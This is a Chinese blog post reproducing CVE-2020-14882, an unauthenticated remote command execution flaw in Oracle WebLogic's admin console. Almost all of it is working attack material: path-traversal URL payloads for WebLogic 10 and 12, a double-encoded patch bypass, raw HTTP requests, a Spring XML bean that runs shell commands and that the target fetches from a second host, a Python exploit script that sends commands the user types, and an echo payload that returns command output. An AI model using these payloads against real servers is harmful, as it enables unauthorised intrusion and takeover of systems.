CVE-2020-14882 weblogic 未授权命令执行复现

作者: print("") 分类: 漏洞复现 发布时间: 2020-11-03 09:09

https://github.com/jas502n/CVE-2020-14882
weblogic 12
/console/css/%2e%2e%2fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22);

weblogic 10
/console/css/%2e%2e%2fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.184.1:8000/spel.xml")

weblogic 12

补丁绕过
GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22); HTTP/1.1
Host: 192.168.3.189:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ADM
Upgrade-Insecure-Requests: 1

weblogic 10

GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.8.142/poc.xml); HTTP/1.1
Host: 192.168.3.189:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ADM
Upgrade-Insecure-Requests: 1

poc.xml文件内容
<?xml version="1.0" encoding="UTF-8" ?>
    <beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     [url]http://www.springframework.org/schema/beans[/url] [url]http://www.springframework.org/schema/beans/spring-beans.xsd[/url]">
        <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
            <constructor-arg >
            <list>
                <value>sh</value>
                <value>-c</value>
                <value><![CDATA[touch /tmp/10poc1]]></value>
            </list>
            </constructor-arg>
        </bean>
    </beans>

https://github.com/RedTeamWing/CVE-2020-14882/blob/main/CVE-2020-14882.py
python
#!/usr/bin/python3

import requests
import sys


banner = '''
_______ ________ ___ ___ ___ ___ __ _ _ ___ ___ ___
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | || | / _ \ / _ \__ \
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | || || (_) | (_) | ) |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |__ _> _ < > _ < / /
| |____ \ / | |____ / /_| |_| / /_| |_| | | | | || (_) | (_) / /_
\_____| \/ |______| |____|\___/____|\___/ |_| |_| \___/ \___/____|

'''
def exploit():
host = sys.argv[1]
port = sys.argv[2]
cmd = input("input cmd>")
path = "/console/images/%252E%252E%252Fconsole.portal"
url = "{}:{}{}".format(host, port, path)


payload = "?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('{}');\");".format(cmd)
headers = {
"User-Agent": "Mozilla",
"Host": host.split("//")[1],
"Accept-Encoding": "gzip, deflate",
"cmd": "tasklist",
"Content-Type": "application/x-www-form-urlencoded"
}

try:
url = url+payload
print("[+]Attack Url:",url)
print("Sent...")
response = requests.get(url,headers=headers,timeout=10,verify=False)
# print(response.text)
except Exception as e:
print(e)
exit()


def exploit2():
'''The second method of use'''
print("你猜")

if __name__ == '__main__':
if len(sys.argv) !=3:
print(banner)
print("Usage: python3 exploit.py http://qq.com 7001\ntips: Your Commands are best encoded in base64")
else:
exploit()
#exploit2()

回显操作
GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();') HTTP/1.1
Host: cqq.com:7001
Connection: close
cmd: whoami

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注